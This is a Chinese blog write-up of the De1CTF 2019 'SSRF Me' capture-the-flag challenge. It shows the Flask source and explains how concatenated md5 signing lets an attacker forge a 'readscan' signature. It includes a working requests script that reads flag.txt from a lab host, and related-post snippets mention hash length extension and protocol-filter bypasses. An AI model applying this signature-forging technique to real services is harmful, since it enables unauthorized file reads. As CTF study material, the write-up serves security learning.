[De1CTF 2019]SSRF Me

已于 2025-08-01 16:17:03 修改
阅读量449 收藏 7
点赞数 9
CC 4.0 BY-SA版权
文章标签: CTF web
于 2025-08-01 16:16:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_79806187/article/details/149832947 
#!/usr/bin/env python
# encoding=utf-8

from flask import Flask, request
import socket
import hashlib
import urllib
import sys
import os
import json

reload(sys)
sys.setdefaultencoding('latin1')

app = Flask(__name__)
secert_key = os.urandom(16)  # 注意:变量名拼写应为secret_key


class Task:
    def __init__(self, action, param, sign, ip):
        self.action = action
        self.param = param
        self.sign = sign
        self.sandbox = md5(ip)
        
        if not os.path.exists(self.sandbox):
            # SandBox For Remote_Addr
            os.mkdir(self.sandbox)

    def Exec(self):
        result = {'code': 500}
        
        if self.checkSign():
            if "scan" in self.action:
                tmpfile_path = "./%s/result.txt" % self.sandbox
                with open(tmpfile_path, 'w') as tmpfile:
                    resp = scan(self.param)
                    if resp == "Connection Timeout":
                        result['data'] = resp
                    else:
                        print(resp)
                        tmpfile.write(resp)
                    result['code'] = 200
                    
            elif "read" in self.action:
                file_path = "./%s/result.txt" % self.sandbox
                with open(file_path, 'r') as f:
                    result['code'] = 200
                    result['data'] = f.read()
                    
            else:
                result['data'] = "Action Error"
        else:
            result['code'] = 500
            result['msg'] = "Sign Error"
            
        return result

    def checkSign(self):
        return getSign(self.action, self.param) == self.sign


# Generate Sign For Action Scan
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)


@app.route('/De1ta', methods=['GET', 'POST'])
def challenge():
    action = urllib.unquote(request.cookies.get("action"))
    param = urllib.unquote(request.args.get("param", ""))
    sign = urllib.unquote(request.cookies.get("sign"))
    ip = request.remote_addr
    
    if waf(param):
        return "No Hacker!!!!"
        
    task = Task(action, param, sign, ip)
    return json.dumps(task.Exec())


@app.route('/')
def index():
    return open("code.txt", "r").read()


def scan(param):
    socket.setdefaulttimeout(1)
    try:
        return urllib.urlopen(param).read()[:50]
    except:
        return "Connection Timeout"


def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()


def md5(content):
    return hashlib.md5(content).hexdigest()


def waf(param):
    check = param.strip().lower()
    return check.startswith("gopher") or check.startswith("file")


if __name__ == '__main__':
    app.debug = False
    app.run(host='0.0.0.0', port=80)

这是一个基于 Flask 的 Web 应用,核心功能是:

  1. 提供签名生成接口(/geneSign
  2. 提供带签名验证的操作接口(/De1ta),支持scan(扫描 URL 内容)和read(读取扫描结果)操作
  3. 每个 IP 有独立的沙箱目录(用 IP 的 MD5 命名),隔离不同用户的数据
  4. 包含简单的 WAF 过滤,禁止gopherfile协议的请求

从后往前看:

1、我们需要读取文件/flag.txt,利用scan(param),所以param=/flag.txt。

2、要想执行scan功能,所以action=scan

3、还要通过checksign验证,这就要求

self.sign == hashlib.md5(secert_key + self.param + self.action).hexdigest()

想构造sign但不知道secret_key,突破点在于提供了geneSign接口,我们直接利用该接口生成,或者说破解mid5(我记得根据现有条件是可以的)。

还有一个需要注意的地方是,scan中读取了目的文件并不会输出到网页上只会输出到服务端控制台以及写入result.txt,所以我们还需要利用read(result.txt)将flag放入响应中。所以我们需要两次访问,并且得保证ip相同。

geneSign接口默认了action是scan,那就不能生成read功能的sign了,因此不可以分成两次访问,我们可以利用一个小漏洞在一次访问中先执行scan再执行read。只需将action设置为scanread。

但是又会出现一个问题,利用geneSign生成的是

sign = hashlib.md5(secert_key + param + 'scan').hexdigest()

但是验证的时候如果设置的action是scanread,那就是验证

hashlib.md5(secert_key + param + 'scanread').hexdigest() == sign

显然是不对的。这就需要利用另一个小技巧,这里md5编码的字符串中用了param + 'scan',我们只需要在geneSign的时候往param后面加一个read,生成的sign=hashlib.md5(secert_key + '/flag.txtread' + 'scan').hexdigest(),然后在Exec的时候令action=readscan,验证时hashlib.md5(secert_key + '/flag.txt' + 'readscan').hexdigest()显然等于sign值。

import requests

url = 'http://a74351ff-4ddf-4d8e-9961-4b9fb67a5d5c.node5.buuoj.cn:81/'
param = {
    "param": "flag.txtread"
}
sign = requests.get(url+'geneSign', params=param)
sign = sign.text
print(sign)

param = {
    "param": "flag.txt"
}
cookies = {
    "action": "readscan",
    "sign": sign
}
r = requests.get(url+'De1ta', cookies=cookies, params=param)
print(r.text)

 尝试破解这里的md5编码手动构造sign:....

[De1CTF 2019]SSRF Me1
m0_73673698的博客
07-24 598
既然/geneSign路由能够返回sign值并且sign值还是md5(secret_key+param+action)的值(因为在python中+代表字符串直接拼接)也就是md5(xxxflag.txtreadscan),又因为在geneSign这一路由中action是固定的等于scan,所以我们要想得到readscan的sign值那么我们可以令param=flag.txtread。通过sign传递然后令action=readscan,通过get方法去传递param=flag.txt,得到flag。
[De1ctf 2019]SSRF Me(哈希拓展攻击)
2301_76690905的博客
01-08 2039
在secret_key + param + action里,已知secert_key = os.urandom(16)(长度16),已知明文flag.txt(param)和scan(action),我们需要添加read。把flag.txt算进秘钥长度里,则秘钥长度为16+8,已知明文为scan,已知hash为8370a8f86a7a74b4053d1bc554a9d126,拓展明文为read,启动刚刚的脚本依次填入得到新明文和新hash,
SSRF类型的CTF题目[De1CTF 2019]SSRF Me1
weixin_73049307的博客
09-26 1043
第一个if要求传入的action中含有scan,然后调用scan函数从文件中查找param这个文件,将文件名给resp,然后通过tmpfile函数写入result.txt中,且令它连通。我们已知flag在flag.txt中,而且最终要通过/De1ta中的param来得到,所以/De1ta中的param=flag.txt。第二个if要求传入的action中含有read,然后从result.txt中查找连通的文件作为f,并让result['data']=f.read得到它的内容。
BUUCTF:[De1CTF 2019]SSRF Me
末初 · mochu7
04-24 1284
https://buuoj.cn/challenges#[De1CTF%202019]SSRF%20Me 源码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencodi
De1CTF 2019 SSRF Me 1
hddi1的博客
02-07 695
直接拼接则利用可控参数。
[De1CTF 2019]SSRF Me 1
plant1234的博客
04-06 1652
[De1CTF 2019]SSRF Me 1 SSRF概述 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 打
buuctf [De1CTF 2019]SSRF Me
qq_52671379的博客
04-19 1096
buuctf [De1CTF 2019]SSRF Me
[De1CTF 2019]SSRF Me | BUUCTF
qq_56313338的博客
09-09 1367
本题有多种解法:拼接字符串或者哈希长度拓展攻击
[De1CTF 2019]SSRF Me1 wp
m0_55185160的博客
03-21 2243
之前学了一周的ssrf,今天来尝试下这个题目,名字直接提示了考点所在,提醒我们注意利用服务端发起的请求。 先查看一下提示为flag is in ./flag.txt,引导我们考虑如何利用SSRF读取flag.txt。 我们打开题目发现是 是一行行由flask框架搭建的web服务。整理代码得到 #! /usr/bin/env python # #encoding=utf-8 from flask import Flask from flask import request import sock
buuctf-[De1CTF 2019]SSRF Me
weixin_43345082的博客
12-30 1175
打开页面就是源码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefault...
三菱图形操作终端连接手册(非三菱产品1).pdf
08-03
三菱图形操作终端连接手册(非三菱产品1).pdf
【基于RESTful设计的高性能API接口实战开发:用户管理与权限控制系统全流程详解】
08-03
内容概要:本文档介绍了基于RESTful设计的高性能API接口的实战开发案例,涵盖从设计、开发、权限控制、性能优化到测试与文档自动化等环节。项目以用户管理与权限控制系统为例,采用Node.js + Express.js作为后端框架,MongoDB为数据库,Mongoose管理数据模型,严格遵循RESTful风格的接口设计,定义了标准HTTP动作对应的操作。安全性方面,实现了JWT认证机制和基于角色的访问控制(RBAC),确保接口安全。性能优化措施包括Redis缓存热点数据、接口请求频率限制、Winston和Morgan日志系统。开发调试借助Postman和Swagger UI,支持自动生成接口文档,提高前后端协作效率。部署方案利用Docker、Nginx、GitHub Actions等技术实现自动化部署,ELK用于日志收集与分析。; 适合人群:有一定编程基础,尤其是对API开发感兴趣的开发者和系统架构师。; 使用场景及目标:①学习RESTful风格的API设计原则;②掌握API的安全机制,如JWT认证和RBAC;③了解性能优化方法,如缓存和限流;④熟悉API开发的完整流程,包括测试、文档管理和部署。; 阅读建议:本案例详细描述了API开发的各个环节,建议读者按照文档顺序逐步学习,重点理解各部分的技术细节和实现原理,同时结合实际项目进行实践。
Canvas实现两张图片合成操作
08-03
资源下载链接为: https://pan.quark.cn/s/d9ef5828b597 Canvas实现两张图片合成操作
【电子设计竞赛】2025电赛D题全解:声音定位系统设计与实现详解
08-03
内容概要:本文详细解析了2025年全国大学生电子设计大赛D题——声音定位系统,从赛题要求、系统架构、硬件选型、算法选择到软件代码实现进行了全面阐述。赛题要求设计一个声音定位系统,包括声响模块、声音接收模块和信息处理模块。声响模块负责产生500Hz的声音信号,声音接收模块通过麦克风和放大电路接收声音信号,信息处理模块则根据声音传播的时间差计算声响模块的位置坐标,并显示出来。发挥部分还包括提高定位精度、连续跟踪显示坐标值和显示移动轨迹。文中还介绍了开发环境搭建、关键代码实现以及常见问题的解决方法。 适合人群:具备一定电子设计基础的大学生、电子设计爱好者和参赛选手。 使用场景及目标:①帮助参赛者理解赛题要求,掌握声音定位系统的设计和实现方法;②提升参赛者的电子设计能力和编程水平,为比赛做好准备;③通过实际项目锻炼创新思维和实践能力,积累宝贵的经验。 其他说明:本文不仅涵盖了硬件选型、电路设计、算法选择等技术细节,还提供了详细的代码实现和优化建议,有助于读者全面掌握声音定位系统的开发过程。此外,文章还强调了电子设计竞赛的重要性,鼓励读者积极参与,探索电子设计的无限可能。
基于FreeRTOS实时操作系统的STM32F103CBT6多功能无线遥控器开发项目_包含MPU6050陀螺仪数据采集_NRF24L01无线通信模块_096寸OLED显示屏_I2.zip
08-03
基于FreeRTOS实时操作系统的STM32F103CBT6多功能无线遥控器开发项目_包含MPU6050陀螺仪数据采集_NRF24L01无线通信模块_096寸OLED显示屏_I2
(完整版)安全知识竞赛试题(含完整答案).pdf
08-03
(完整版)安全知识竞赛试题(含完整答案).pdf
基于JavaScript的PDF文档生成与处理工具_支持中文文本排版_包含字体嵌入_表格绘制_图片插入_分页控制_水印添加_书签生成_加密保护_表单填写_条形码生成_二维码嵌入_多.zip
08-03
基于JavaScript的PDF文档生成与处理工具_支持中文文本排版_包含字体嵌入_表格绘制_图片插入_分页控制_水印添加_书签生成_加密保护_表单填写_条形码生成_二维码嵌入_多
基于网格图的单机器人路径规划,采用ACO、ACO+GA、SSA、ISSA算法.zip
最新发布
08-03
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
[de1ctf 2019]ssrf me 1
03-16
好的,我来回答这个问题。 [de1ctf 2019]ssrf me 1 是一道关于SSRF的题目。它的目标是通过利用SSRF漏洞,访问位于内部网络中的一个HTTP服务,从而获取flag。 具体来说,题目中提供了一个Web应用程序,该应用程序允许用户输入一个URL,然后应用程序将请求发送到该URL,并将响应返回给用户。因此,我们可以在URL参数中输入我们想要访问的目标HTTP服务的地址,然后查看返回结果。 然而,为了防止应用程序被滥用,开发人员在应用程序中实现了一些安全措施。例如,应用程序会检查URL参数中是否包含一些不被允许的字符串,比如localhost、127.0.0.1等。此外,还有一些其他限制条件需要考虑。 因此,我们需要找到一种方法来绕过这些安全措施,从而成功访问目标HTTP服务。一种常见的技巧是使用一些特殊的URL协议,例如file协议、gopher协议等,来绕过安全检查。此外,我们还可以利用DNS rebinding攻击来绕过防御,但是需要特别注意,这种攻击可能涉及到一些法律和道德上的问题。 总之,这道题目需要具备一定的SSRF漏洞利用经验和技能,同时还需要对网络安全有一定的了解。如果你想进一步了解SSRF漏洞的原理和防御方法,可以查看相关的资料和教程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值